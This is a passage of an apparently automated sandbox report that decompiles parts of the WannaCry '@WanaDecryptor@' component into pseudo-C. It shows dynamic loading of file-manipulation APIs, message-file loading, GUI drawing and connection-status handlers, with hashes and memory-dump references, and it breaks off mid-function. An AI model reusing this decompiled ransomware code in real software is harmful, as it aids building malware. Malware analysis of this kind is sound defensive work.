                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #800$#537#924sprintf$#3874#540AttributesFile
                                  • String ID: English$m_%s.wnry$msg\
                                  • API String ID: 3713669620-4206458537
                                  • Opcode ID: f36c2dcfbfc0b931c038135b008570d0ce4cdd6941e9a910e96e45ef17743a79
                                  • Instruction ID: 3ad7a17867ea9436e9d42ea8b12d154e8c58dea708134770199309aae3637b36
                                  • Opcode Fuzzy Hash: f36c2dcfbfc0b931c038135b008570d0ce4cdd6941e9a910e96e45ef17743a79
                                  • Instruction Fuzzy Hash: 4A316170108341AEC324EB25D941FDE77A4BBA8714F404E1EF59AC32D1EB789558CAA7
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00402C40() {
                                  				_Unknown_base(*)()* _t11;
                                  				struct HINSTANCE__* _t23;
                                  
                                  				if(E00404B70() == 0) {
                                  					L12:
                                  					return 0;
                                  				} else {
                                  					if( *0x4217a0 == 0) {
                                  						_t23 = LoadLibraryA("kernel32.dll");
                                  						if(_t23 == 0) {
                                  							goto L12;
                                  						} else {
                                  							 *0x4217a0 = GetProcAddress(_t23, "CreateFileW");
                                  							 *0x4217a4 = GetProcAddress(_t23, "WriteFile");
                                  							 *0x4217a8 = GetProcAddress(_t23, "ReadFile");
                                  							 *0x4217ac = GetProcAddress(_t23, "MoveFileW");
                                  							 *0x4217b0 = GetProcAddress(_t23, "MoveFileExW");
                                  							 *0x4217b4 = GetProcAddress(_t23, "DeleteFileW");
                                  							_t11 = GetProcAddress(_t23, "CloseHandle");
                                  							 *0x4217b8 = _t11;
                                  							if( *0x4217a0 == 0 ||  *0x4217a4 == 0 ||  *0x4217a8 == 0 ||  *0x4217ac == 0 ||  *0x4217b0 == 0 ||  *0x4217b4 == 0 || _t11 == 0) {
                                  								goto L12;
                                  							} else {
                                  								return 1;
                                  							}
                                  						}
                                  					} else {
                                  						return 1;
                                  					}
                                  				}
                                  			}






                                  APIs
                                  • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00402C63
                                  • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00402C80
                                  • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00402C8D
                                  • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 00402C9A
                                  • GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 00402CA7
                                  • GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 00402CB4
                                  • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 00402CC1
                                  • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00402CCE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: CloseHandle$CreateFileW$DeleteFileW$MoveFileExW$MoveFileW$ReadFile$WriteFile$kernel32.dll
                                  • API String ID: 2238633743-1294736154
                                  • Opcode ID: 468b1d099fd8a0684a95be66b91aae829347793d9c58d8a41e664e10bf98f029
                                  • Instruction ID: a2b5d8bb757b14b28e15fb80ad1863100e1319e91a413c2d323d0fcc62a15203
                                  • Opcode Fuzzy Hash: 468b1d099fd8a0684a95be66b91aae829347793d9c58d8a41e664e10bf98f029
                                  • Instruction Fuzzy Hash: AA110334B423216BD734AB25BD58FA72695EFD4701795003FA801E76E1D7B89C42CA5C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 78%
                                  			E00405580(void* __ecx) {
                                  				int _v8;
                                  				intOrPtr _v12;
                                  				char _v28;
                                  				char _v80;
                                  				void* _v96;
                                  				struct tagRECT _v112;
                                  				signed int _v116;
                                  				void* _v120;
                                  				struct HDC__* _v140;
                                  				long _v144;
                                  				struct tagRECT _v160;
                                  				char _v164;
                                  				void* _v172;
                                  				intOrPtr _v176;
                                  				char _v188;
                                  				int _v192;
                                  				int _v196;
                                  				int _v204;
                                  				intOrPtr _v212;
                                  				void* _v216;
                                  				struct HBRUSH__* _v220;
                                  				char _v224;
                                  				intOrPtr _v228;
                                  				void* _v244;
                                  				intOrPtr _v248;
                                  				intOrPtr _v252;
                                  				signed int _v256;
                                  				void* _v260;
                                  				void* _v264;
                                  				void* _v268;
                                  				int _v272;
                                  				intOrPtr _v296;
                                  				intOrPtr _v300;
                                  				intOrPtr _v304;
                                  				int _t78;
                                  				long _t79;
                                  				struct HBRUSH__* _t80;
                                  				struct HDC__* _t84;
                                  				char _t85;
                                  				struct HBRUSH__* _t86;
                                  				intOrPtr _t89;
                                  				intOrPtr _t90;
                                  				intOrPtr _t102;
                                  				intOrPtr _t104;
                                  				intOrPtr _t108;
                                  				intOrPtr _t136;
                                  				void* _t151;
                                  				struct HBRUSH__* _t152;
                                  				void* _t153;
                                  				void* _t156;
                                  				int _t160;
                                  				intOrPtr _t162;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413943);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t162;
                                  				_t156 = __ecx;
                                  				_t78 = GetClientRect( *(__ecx + 0x20),  &_v112);
                                  				_t160 = 0;
                                  				_v204 = 0;
                                  				_t108 =  *((intOrPtr*)( *((intOrPtr*)(_t156 + 0x44)) - 8));
                                  				_v176 = _t108;
                                  				if(_t108 != 0) {
                                  					L00412DD0();
                                  					_t79 =  *(_t156 + 0x50);
                                  					_v8 = 0;
                                  					_v164 = 0xffb53f;
                                  					_v160.left = _t79;
                                  					_v160.top = 0x674017;
                                  					_v160.right =  *((intOrPtr*)(_t156 + 0x4c));
                                  					_v160.bottom = 0;
                                  					_v144 =  *(_t156 + 0x54);
                                  					L00412E5A();
                                  					_t80 =  *((intOrPtr*)(_t79 + 8));
                                  					__imp__#8(_t80,  *((intOrPtr*)(_t156 + 0x58)), 0,  &_v164, 3, _t156, _t151);
                                  					_t152 = _t80;
                                  					_v220 = _t152;
                                  					L00412E54();
                                  					asm("sbb eax, eax");
                                  					_v28 = 1;
                                  					_t84 = CreateCompatibleDC( ~( &_v120) & _v116);
                                  					_push(_t84);
                                  					L00412E4E();
                                  					_push(_t152);
                                  					L00412DE2();
                                  					if(_t84 != 0) {
                                  						_t84 =  *(_t84 + 4);
                                  					}
                                  					_push(_t84);
                                  					_t85 = _v224;
                                  					_push(_t85);
                                  					L00412E48();
                                  					_v212 = _t85;
                                  					_t153 = 0;
                                  					_v252 = 1;
                                  					_t86 = CreateSolidBrush( *(_t156 + 0x54));
                                  					_v220 = _t86;
                                  					FillRect(_v140,  &_v160, _t86);
                                  					_t89 = 0;
                                  					_v260 = 0;
                                  					if(_t108 > 0) {
                                  						do {
                                  							_v224 =  *((intOrPtr*)( *((intOrPtr*)(_t156 + 0x44)) + _t89));
                                  							E00405110(_t156,  &_v188, _v224);
                                  							asm("sbb eax, eax");
                                  							BitBlt(_v160, _t160, _v272,  *((intOrPtr*)(_t156 + 0x60)) +  *((intOrPtr*)(_t156 + 0x68)),  *((intOrPtr*)(_t156 + 0x64)) +  *((intOrPtr*)(_t156 + 0x6c)),  ~( &_v260) & _v256, _v196, _v192, 0xcc0020);
                                  							_t102 =  *((intOrPtr*)(_t156 + 0x74));
                                  							_t160 = _t160 +  *((intOrPtr*)(_t156 + 0x60)) +  *((intOrPtr*)(_t156 + 0x68));
                                  							_t153 = _t153 + 1;
                                  							if(_t153 != _t102) {
                                  								goto L10;
                                  							} else {
                                  								_t136 =  *((intOrPtr*)(_t156 + 0x70));
                                  								if(_t136 != 1) {
                                  									if(_t153 != _t102) {
                                  										goto L10;
                                  									} else {
                                  										_t104 = _t136;
                                  										if(_t104 <= 1) {
                                  											goto L10;
                                  										} else {
                                  											if(_v304 != _t104) {
                                  												_t153 = 0;
                                  												_t160 = 0;
                                  												_v300 = _v300 +  *((intOrPtr*)(_t156 + 0x64)) +  *((intOrPtr*)(_t156 + 0x6c));
                                  												_v304 = _v304 + 1;
                                  												goto L10;
                                  											}
                                  										}
                                  									}
                                  								}
                                  							}
                                  							goto L11;
                                  							L10:
                                  							_t89 = _v296 + 1;
                                  							_v296 = _t89;
                                  						} while (_t89 < _v272);
                                  					}
                                  					L11:
                                  					_t90 = _v228;
                                  					if(_t90 != 0) {
                                  						_t90 =  *((intOrPtr*)(_t90 + 4));
                                  					}
                                  					_push(_t90);
                                  					_push(_v248);
                                  					L00412E48();
                                  					L00412E42();
                                  					DeleteObject(_v264);
                                  					_t78 = DeleteObject(_v244);
                                  					_v80 = 0;
                                  					L00412E3C();
                                  					_v80 = 0xffffffff;
                                  					L00412DB8();
                                  				}
                                  				 *[fs:0x0] = _v12;
                                  				return _t78;
                                  			}

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #5785CreateDeleteObjectRect$#1168#1640#2405#2860#323#470#640#755BrushClientCompatibleFillSolid
                                  • String ID:
                                  • API String ID: 1233696098-0
                                  • Opcode ID: 3787f29b2f3b6759b14921245bb0c5350f6533f71f74a9e78965702df0d7f065
                                  • Instruction ID: b627e9c1237585dd637a27707791d59f98fdace04f8481d3914a5fbe5096edf5
                                  • Opcode Fuzzy Hash: 3787f29b2f3b6759b14921245bb0c5350f6533f71f74a9e78965702df0d7f065
                                  • Instruction Fuzzy Hash: 057135716087419FC324DF69C984AABB7E9FB88704F004A2EF59AC3350DB74E845CB66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 75%
                                  			E00408D70(intOrPtr __ecx, signed long long __fp0, intOrPtr* _a4, int _a8, signed int _a12, unsigned int _a16, signed int _a20) {
                                  				intOrPtr _v0;
                                  				unsigned int _v4;
                                  				unsigned int _v8;
                                  				unsigned int _v12;
                                  				intOrPtr _v20;
                                  				char _v36;
                                  				intOrPtr _v56;
                                  				char _v60;
                                  				intOrPtr _v64;
                                  				char _v68;
                                  				unsigned int _v72;
                                  				signed int _v76;
                                  				signed int _v80;
                                  				intOrPtr _v84;
                                  				signed int _v88;
                                  				signed int _v92;
                                  				signed int _v96;
                                  				signed long long _v100;
                                  				intOrPtr _v104;
                                  				void* _v108;
                                  				void* _v112;
                                  				void* _v120;
                                  				unsigned int _t93;
                                  				signed int _t96;
                                  				signed int _t100;
                                  				unsigned int _t102;
                                  				signed int _t107;
                                  				int _t112;
                                  				char _t113;
                                  				signed char _t115;
                                  				RECT* _t122;
                                  				signed int _t125;
                                  				signed int _t134;
                                  				intOrPtr* _t135;
                                  				unsigned int _t138;
                                  				signed int _t140;
                                  				signed int _t143;
                                  				intOrPtr* _t146;
                                  				char _t151;
                                  				char _t152;
                                  				signed int _t169;
                                  				intOrPtr* _t177;
                                  				signed int _t192;
                                  				intOrPtr* _t193;
                                  				intOrPtr _t195;
                                  				unsigned int _t202;
                                  				char _t209;
                                  				intOrPtr _t210;
                                  				signed long long _t228;
                                  				signed long long _t229;
                                  				signed long long _t230;
                                  				signed long long _t231;
                                  				signed long long _t234;
                                  
                                  				_t228 = __fp0;
                                  				_push(0xffffffff);
                                  				_push(E004140A0);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t210;
                                  				_t93 = _a20;
                                  				_v104 = __ecx;
                                  				_t138 = _a16;
                                  				_t169 = _t138 & 0x000000ff;
                                  				_v76 = _t169;
                                  				_t192 = (_t93 & 0x000000ff) - _t169;
                                  				_t140 = _t138 >> 0x00000010 & 0x000000ff;
                                  				_t96 = (_t93 >> 0x00000010 & 0x000000ff) - _t140;
                                  				_v88 = 0;
                                  				_v96 = _t96;
                                  				_v92 = _t140;
                                  				asm("cdq");
                                  				_t143 = _t96 ^ 0;
                                  				_v100 = 0;
                                  				asm("cdq");
                                  				_a20 = _t192;
                                  				_t134 = 0;
                                  				if(0 <= _t143) {
                                  					_t134 = _t143;
                                  				}
                                  				asm("cdq");
                                  				_t100 = _t192 ^ 0;
                                  				if(_t100 <= _t134) {
                                  					_a16 = 0;
                                  					if(0 <= _t143) {
                                  						_a16 = _t143;
                                  					}
                                  				} else {
                                  					_a16 = _t100;
                                  				}
                                  				_t193 = _a8;
                                  				_t102 =  *((intOrPtr*)(_t193 + 8)) -  *_t193;
                                  				if(_t102 < _a16) {
                                  					_a16 = _t102;
                                  				}
                                  				if(_a16 == 0) {
                                  					_a16 = 1;
                                  				}
                                  				asm("fild dword [esp+0x88]");
                                  				asm("fild dword [esp+0x8c]");
                                  				_t135 = _a4;
                                  				_t229 = _t228 / st1;
                                  				_v80 = _t229;
                                  				asm("fild dword [esp+0x1c]");
                                  				_t230 = _t229 / st1;
                                  				_v100 = _t230;
                                  				asm("fild dword [esp+0x20]");
                                  				_t231 = _t230 / st1;
                                  				_v96 = _t231;
                                  				st0 = _t231;
                                  				_t107 = GetDeviceCaps( *( *_t135 + 8), 0x26) & 0x00000100;
                                  				_v80 = _t107;
                                  				if(_t107 == 0 && _a8 > 1) {
                                  					_t125 = GetDeviceCaps( *( *_t135 + 8), 0xc);
                                  					if(GetDeviceCaps( *( *_t135 + 8), 0xe) * _t125 < 8) {
                                  						_v8 = 1;
                                  					}
                                  				}
                                  				_t146 = _t193;
                                  				_a12 =  *((intOrPtr*)(_t193 + 8)) -  *_t193;
                                  				_t202 = 0;
                                  				asm("fild dword [esp+0x8c]");
                                  				_v72 = 0;
                                  				_v68 =  *_t146;
                                  				_v76 = 0x415a44;
                                  				asm("fidiv dword [esp+0x88]");
                                  				_v64 =  *((intOrPtr*)(_t146 + 4));
                                  				_v60 =  *((intOrPtr*)(_t146 + 8));
                                  				_v56 =  *((intOrPtr*)(_t146 + 0xc));
                                  				_a12 = _t231;
                                  				_t112 = _a8;
                                  				_v12 = 0;
                                  				_v4 = 0;
                                  				if(_t112 <= 0) {
                                  					L31:
                                  					_v76 = 0x415c00;
                                  					_v12 = 1;
                                  					L00412D52();
                                  					 *[fs:0x0] = _v20;
                                  					return _t112;
                                  				} else {
                                  					while(1) {
                                  						asm("fild dword [esp+0x7c]");
                                  						_t195 =  *_t193;
                                  						L0041304A();
                                  						_t46 = _t202 + 1; // 0x1
                                  						_v4 = _t46;
                                  						_t209 = _t112 + _t195;
                                  						asm("fild dword [esp+0x7c]");
                                  						_v68 = _t209;
                                  						_t234 = st0 * _a12 * _a12;
                                  						L0041304A();
                                  						_t113 = _t112 + _t195;
                                  						_v60 = _t113;
                                  						if(_t202 == _a8 - 1) {
                                  							_t113 =  *((intOrPtr*)(_v0 + 8));
                                  							_v60 = _t113;
                                  						}
                                  						_t177 = _a4;
                                  						_t151 =  *_t177;
                                  						if(_t113 < _t151) {
                                  							goto L29;
                                  						}
                                  						if(_t209 < _t151) {
                                  							_v68 = _t151;
                                  						}
                                  						_t152 =  *((intOrPtr*)(_t177 + 8));
                                  						if(_t113 > _t152) {
                                  							_v60 = _t152;
                                  						}
                                  						L0041304A();
                                  						_v92 = 0;
                                  						L0041304A();
                                  						_t115 = _t113 + _v100 + _v96;
                                  						_v92 = _t115 << 8;
                                  						L0041304A();
                                  						_push(_t115 + _v84 & 0x000000ff | _v92);
                                  						if(_v80 == 0) {
                                  							_t112 = E00409D40( &_v36, _t135,  &_v68);
                                  							_push(_t112);
                                  							L00412FF2();
                                  						} else {
                                  							_push(CreateSolidBrush());
                                  							L00412D5E();
                                  							_t122 = E00409D40( &_v60, _t135,  &_v76);
                                  							_t76 =  &_v96; // 0x415a44
                                  							asm("sbb ecx, ecx");
                                  							_t112 = FillRect( *( *_t135 + 4), _t122,  ~_t76 & _v92);
                                  							L00412D52();
                                  						}
                                  						if(_v68 <  *((intOrPtr*)(_v4 + 8))) {
                                  							L30:
                                  							_t202 = _v4;
                                  							_t112 = _a8;
                                  							_v4 = _t202;
                                  							if(_t202 < _t112) {
                                  								_t193 = _v0;
                                  								continue;
                                  							}
                                  						}
                                  						goto L31;
                                  						L29:
                                  						st0 = _t234;
                                  						goto L30;
                                  					}
                                  				}
                                  			}
                                  0x00408f74
                                  0x00408f78
                                  0x00408f7f
                                  0x00408f8b
                                  0x00408f8d
                                  0x00408f96
                                  0x00408f9f
                                  0x00408fa2
                                  0x00408fa2
                                  0x00408fa6
                                  0x00408fad
                                  0x00408fb1
                                  0x00000000
                                  0x00000000
                                  0x00408fb9
                                  0x00408fbb
                                  0x00408fbb
                                  0x00408fbf
                                  0x00408fc4
                                  0x00408fc6
                                  0x00408fc6
                                  0x00408fd0
                                  0x00408fe5
                                  0x00408fe9
                                  0x00408ffa
                                  0x00409001
                                  0x00409005
                                  0x00409021
                                  0x00409022
                                  0x0040907e
                                  0x00409085
                                  0x00409086
                                  0x00409024
                                  0x0040902a
                                  0x0040902f
                                  0x00409043
                                  0x0040904e
                                  0x00409054
                                  0x0040905e
                                  0x00409068
                                  0x00409068
                                  0x00409099
                                  0x0040909f
                                  0x0040909f
                                  0x004090a3
                                  0x004090ac
                                  0x004090b0
                                  0x00408f4a
                                  0x00000000
                                  0x00408f4a
                                  0x004090b0
                                  0x00000000
                                  0x0040909d
                                  0x0040909d
                                  0x00000000
                                  0x0040909d
                                  0x00408f51

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _ftol$CapsDevice$#2414$#1641#2754BrushCreateFillRectSolid
                                  • String ID: DZA
                                  • API String ID: 2487345631-3378329814
                                  • Opcode ID: 46f8ac59b565287c612820a18e91b1c7afa6038287a955736cfc91f47d65fae1
                                  • Instruction ID: dda82c2241e8f2351b86cfb5efeedf8da928c70a362fdc9ee550b763b14e0e54
                                  • Opcode Fuzzy Hash: 46f8ac59b565287c612820a18e91b1c7afa6038287a955736cfc91f47d65fae1
                                  • Instruction Fuzzy Hash: 2CA147716087418FC324DF25C984AAABBE1FFC8704F148A2EF599D7291DA39D845CF86
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 65%
                                  			E00401600(void* __ecx, intOrPtr _a4, long _a8, intOrPtr _a12) {
                                  				void* _t19;
                                  				long _t21;
                                  				long _t24;
                                  				void* _t25;
                                  				void* _t26;
                                  				intOrPtr _t27;
                                  				long _t48;
                                  				void* _t49;
                                  				intOrPtr _t50;
                                  
                                  				_t27 = _a4;
                                  				_t48 = _a8;
                                  				_t19 = _t27 - 0x4e20;
                                  				_t49 = __ecx;
                                  				if(_t19 == 0) {
                                  					if(_t48 != 0) {
                                  						if(_t48 == 0xffffffff) {
                                  							goto L14;
                                  						}
                                  						goto L15;
                                  					} else {
                                  						_push(__ecx);
                                  						_a4 = _t50;
                                  						L00412CAA();
                                  						E00401970("Connected");
                                  						_t21 = SendMessageA( *(_t49 + 0x80), 0x402, 0x1e, _t48);
                                  						_push(_a4);
                                  						_push(_t48);
                                  						_push(_t27);
                                  						 *(_t49 + 0xb0) = 0x23;
                                  						L00412BAE();
                                  						return _t21;
                                  					}
                                  				} else {
                                  					_t19 = _t19 - 1;
                                  					if(_t19 == 0) {
                                  						if(_t48 != 0) {
                                  							goto L9;
                                  						} else {
                                  							_push(__ecx);
                                  							_a4 = _t50;
                                  							L00412CAA();
                                  							E00401970("Sent request");
                                  							_t24 = SendMessageA( *(_t49 + 0x80), 0x402, 0x23, _t48);
                                  							_push(_a4);
                                  							_push(_t48);
                                  							_push(_t27);
                                  							 *(_t49 + 0xb0) = 0x28;
                                  							L00412BAE();
                                  							return _t24;
                                  						}
                                  					} else {
                                  						_t19 = _t19 - 1;
                                  						if(_t19 != 0) {
                                  							L15:
                                  							_push(_a12);
                                  							_push(_t48);
                                  							_push(_t27);
                                  							L00412BAE();
                                  							return _t19;
                                  						} else {
                                  							if(_t48 != 0) {
                                  								if(_t48 != 1) {
                                  									L9:
                                  									if(_t48 == 0xffffffff) {
                                  										L14:
                                  										 *((intOrPtr*)(_t49 + 0xa8)) = 0xffffffff;
                                  									}
                                  									goto L15;
                                  								} else {
                                  									_push(__ecx);
                                  									_a4 = _t50;
                                  									L00412CAA();
                                  									_t25 = E00401970("Succeed");
                                  									_push(_a4);
                                  									_push(_t48);
                                  									_push(_t27);
                                  									L00412BAE();
                                  									return _t25;
                                  								}
                                  							} else {
                                  								_push(__ecx);
                                  								_a4 = _t50;
                                  								L00412CAA();
                                  								_t26 = E00401970("Received response");
                                  								_push(_a4);
                                  								_push(_t48);
                                  								_push(_t27);
                                  								 *((intOrPtr*)(_t49 + 0xa8)) = 1;
                                  								L00412BAE();
                                  								return _t26;
                                  							}
                                  						}
                                  					}
                                  				}
                                  			}













                                  APIs
                                  • #2385.MFC42 ref: 00401653
                                  • #537.MFC42(Received response), ref: 00401634
                                    • Part of subcall function 00401970: #3092.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 00401997
                                    • Part of subcall function 00401970: #6199.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 0040199E
                                    • Part of subcall function 00401970: #800.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 004019AF
                                  • #537.MFC42(Succeed), ref: 0040166F
                                  • #2385.MFC42(?,?,?,Succeed), ref: 00401684
                                  • #537.MFC42(Sent request), ref: 0040169F
                                  • SendMessageA.USER32(?,00000402,00000023,?), ref: 004016BA
                                  • #2385.MFC42 ref: 004016D3
                                  • #537.MFC42(Connected), ref: 004016F5
                                  • SendMessageA.USER32(?,00000402,0000001E,?), ref: 00401710
                                  • #2385.MFC42 ref: 00401729
                                  • #2385.MFC42(?,?,?), ref: 0040174C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2385$#537$MessageSend$#3092#6199#800
                                  • String ID: Connected$Received response$Sent request$Succeed
                                  • API String ID: 3790904636-3692714192
                                  • Opcode ID: 77cbd13b205d5b60acded2d534e2f67ef19f14b7a7dcd1ce5799653af05fca91
                                  • Instruction ID: e9690c31fbc1831b63af9a5cc079f352e9ea826ed21b4fe1124c0ccffc889961
                                  • Opcode Fuzzy Hash: 77cbd13b205d5b60acded2d534e2f67ef19f14b7a7dcd1ce5799653af05fca91
                                  • Instruction Fuzzy Hash: A631E8B130430067C5209F1AD959EAF7B69EBD4BB4F10852FF149A33D1CA795C4582FA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 78%
                                  			E00404DD0(void* __ecx) {
                                  				intOrPtr _t12;
                                  				long _t13;
                                  				struct HFONT__* _t15;
                                  				long _t16;
                                  				long _t17;
                                  				int _t29;
                                  				int _t32;
                                  				int _t35;
                                  
                                  				L00412CB0();
                                  				_t12 =  *0x42189c; // 0x0
                                  				_t13 =  *(_t12 + 0x824);
                                  				 *(__ecx + 0x6c) = _t13;
                                  				_push(CreateSolidBrush(_t13));
                                  				L00412D5E();
                                  				_t35 = __ecx + 0x70;
                                  				_t15 = CreateFontA(0x10, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial");
                                  				_push(_t15);
                                  				L00412D5E();
                                  				_push(0x403);
                                  				L00412CE6();
                                  				if(_t35 != 0) {
                                  					_t29 =  *(_t35 + 4);
                                  				} else {
                                  					_t29 = 0;
                                  				}
                                  				_t16 = SendMessageA( *(_t15 + 0x20), 0x30, _t29, 1);
                                  				_push(1);
                                  				L00412CE6();
                                  				if(_t35 != 0) {
                                  					_t32 =  *(_t35 + 4);
                                  				} else {
                                  					_t32 = 0;
                                  				}
                                  				_t17 = SendMessageA( *(_t16 + 0x20), 0x30, _t32, 1);
                                  				_push(2);
                                  				L00412CE6();
                                  				if(_t35 != 0) {
                                  					SendMessageA( *(_t17 + 0x20), 0x30,  *(_t35 + 4), 1);
                                  					return 1;
                                  				} else {
                                  					SendMessageA( *(_t17 + 0x20), 0x30, _t35, 1);
                                  					return 1;
                                  				}
                                  			}












                                  APIs
                                  • #4710.MFC42 ref: 00404DD5
                                  • CreateSolidBrush.GDI32(?), ref: 00404DE9
                                  • #1641.MFC42(00000000), ref: 00404DF3
                                  • CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00404E1D
                                  • #1641.MFC42(00000000), ref: 00404E26
                                  • #3092.MFC42(00000403,00000000), ref: 00404E32
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E51
                                  • #3092.MFC42(00000001), ref: 00404E57
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E70
                                  • #3092.MFC42(00000002), ref: 00404E76
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E88
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E9F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#3092$#1641Create$#4710BrushFontSolid
                                  • String ID: Arial
                                  • API String ID: 1126252797-493054409
                                  • Opcode ID: 1de1fe04c409b87552040b023bf9e037168031db0fca800ba09ccd0f6b59f890
                                  • Instruction ID: f8dd995afa615cab71677879a74d6ff7c2e305333cbfc3da3be905e2a6067967
                                  • Opcode Fuzzy Hash: 1de1fe04c409b87552040b023bf9e037168031db0fca800ba09ccd0f6b59f890
                                  • Instruction Fuzzy Hash: CC21C6B13507107FE625A764DD86FAA2759BBC8B40F10011EB345AB2D1CAF5EC41879C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 64%
                                  			E00406DC0(void* __ecx) {
                                  				int _v76;
                                  				int _v80;
                                  				char _v84;
                                  				int _v88;
                                  				long _v92;
                                  				void* _v96;
                                  				int _v100;
                                  				void* _v104;
                                  				long _t28;
                                  				void* _t29;
                                  				struct HWND__* _t30;
                                  				int _t32;
                                  				void* _t35;
                                  				int _t39;
                                  				long _t47;
